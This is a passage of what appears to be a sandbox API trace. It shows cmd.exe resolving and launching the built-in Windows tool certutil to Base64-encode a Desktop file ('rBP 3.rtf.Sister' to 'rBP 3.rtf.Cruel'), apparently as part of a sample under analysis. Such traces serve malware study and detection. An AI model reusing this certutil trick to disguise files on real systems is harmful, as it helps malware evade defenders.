nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0246.630] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0246.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0246.631] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0246.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xbd35dee6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbd35dee6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cee0 [0246.631] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0246.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="rBP 3.rtf.Sister", cAlternateFileName="RBP3RT~1.SIS")) returned 0x21ed8c7cee0 [0246.631] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0246.632] _wcsnicmp (_String1="RBP3RT~1.SIS", _String2="rBP 3.rtf.Sister", _MaxCount=0x10) returned 19 [0246.632] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0246.632] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0246.632] GetProcessHeap () returned 0x21ed8c70000 [0246.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45da0 [0246.632] ??_V@YAXPEAX@Z () returned 0x1 [0246.632] ??_V@YAXPEAX@Z () returned 0x1 [0246.632] GetProcessHeap () returned 0x21ed8c70000 [0246.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69d80, Size=0x180) returned 0x21ed8d69d80 [0246.632] GetProcessHeap () returned 0x21ed8c70000 [0246.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69d80) returned 0x180 [0246.632] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0246.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0246.632] GetFileType (hFile=0x50) returned 0x2 [0246.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.632] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0246.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0246.703] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0246.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0246.779] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0246.779] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0246.779] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0246.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0246.779] GetFileType (hFile=0x50) returned 0x2 [0246.779] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.779] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0246.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0246.849] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0246.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0246.920] GetFileType (hFile=0x50) returned 0x2 [0246.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0246.920] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0247.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.020] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69d20*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69d20*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0247.124] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\" ") returned 46 [0247.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.124] GetFileType (hFile=0x50) returned 0x2 [0247.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0247.124] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0247.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.210] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x2e) returned 1 [0247.317] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0247.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.317] GetFileType (hFile=0x50) returned 0x2 [0247.317] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0247.317] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0247.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.447] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0247.523] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0247.604] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0247.604] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0247.604] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0247.604] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0247.604] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0247.604] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0247.604] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0247.604] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0247.604] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0247.604] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0247.604] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0247.604] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0247.604] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0247.605] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0247.605] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0247.605] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0247.605] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0247.605] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0247.605] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0247.605] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0247.605] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0247.605] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0247.605] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0247.605] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0247.605] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0247.605] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0247.605] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0247.605] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0247.614] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0247.614] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0247.614] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0247.614] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0247.614] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0247.614] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0247.614] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0247.614] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0247.614] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0247.614] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0247.614] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0247.614] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0247.614] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0247.615] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0247.615] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0247.615] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0247.615] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0247.615] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0247.615] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0247.615] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0247.615] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0247.615] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0247.615] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0247.615] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0247.615] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0247.615] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0247.615] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0247.615] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0247.615] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0247.615] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0247.615] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0247.615] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0247.616] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0247.616] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0247.616] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0247.616] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0247.616] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0247.616] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0247.616] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0247.616] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0247.616] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0247.616] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0247.616] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0247.616] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0247.616] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0247.616] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0247.616] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0247.616] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0247.616] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0247.616] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0247.616] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0247.616] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0247.617] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0247.617] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0247.617] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0247.617] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0247.617] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0247.617] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0247.617] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0247.617] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0247.617] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0247.617] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0247.617] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0247.617] ??_V@YAXPEAX@Z () returned 0x1 [0247.617] GetProcessHeap () returned 0x21ed8c70000 [0247.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9321450 [0247.618] GetProcessHeap () returned 0x21ed8c70000 [0247.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7e) returned 0x21ed93795d0 [0247.618] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0247.618] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0247.618] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0247.618] GetProcessHeap () returned 0x21ed8c70000 [0247.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9331440 [0247.620] SetErrorMode (uMode=0x0) returned 0x0 [0247.620] SetErrorMode (uMode=0x1) returned 0x0 [0247.620] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9331450, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0247.620] SetErrorMode (uMode=0x0) returned 0x1 [0247.620] GetProcessHeap () returned 0x21ed8c70000 [0247.620] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9331440, Size=0x52) returned 0x21ed9331440 [0247.620] GetProcessHeap () returned 0x21ed8c70000 [0247.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9331440) returned 0x52 [0247.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0247.620] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5e420 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed9980420 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980420, Size=0x1be) returned 0x21ed9980420 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980420) returned 0x1be [0247.621] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c79210 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.621] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c79210, Size=0x7e) returned 0x21ed8c79210 [0247.621] GetProcessHeap () returned 0x21ed8c70000 [0247.622] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c79210) returned 0x7e [0247.622] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.622] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0247.630] GetLastError () returned 0x2 [0247.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.631] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0247.631] GetLastError () returned 0x2 [0247.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.631] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0247.632] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0247.632] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0247.632] GetLastError () returned 0x2 [0247.632] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0247.632] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0247.632] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0247.632] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0247.632] ??_V@YAXPEAX@Z () returned 0x1 [0247.632] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0247.736] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0247.736] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0247.736] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0247.737] GetProcessHeap () returned 0x21ed8c70000 [0247.737] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45b30 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0247.738] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0247.739] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0247.740] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0247.740] GetProcessHeap () returned 0x21ed8c70000 [0247.740] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0247.740] GetProcessHeap () returned 0x21ed8c70000 [0247.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95b80 [0247.740] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0247.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0247.740] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0247.868] _get_osfhandle (_FileHandle=0) returned 0x4c [0247.868] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0247.945] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"rBP 3.rtf.Sister\" \"rBP 3.rtf.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1198, dwThreadId=0x1184)) returned 1 [0247.980] CloseHandle (hObject=0xa4) returned 1 [0247.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0247.980] GetProcessHeap () returned 0x21ed8c70000 [0247.980] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0247.980] GetEnvironmentStringsW () returned 0x21ed8d44660* [0247.980] GetProcessHeap () returned 0x21ed8c70000 [0247.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0247.981] FreeEnvironmentStringsA (penv="=") returned 1 [0247.981] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0249.556] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0249.556] CloseHandle (hObject=0xa8) returned 1 [0249.556] _vsnwprintf (in: 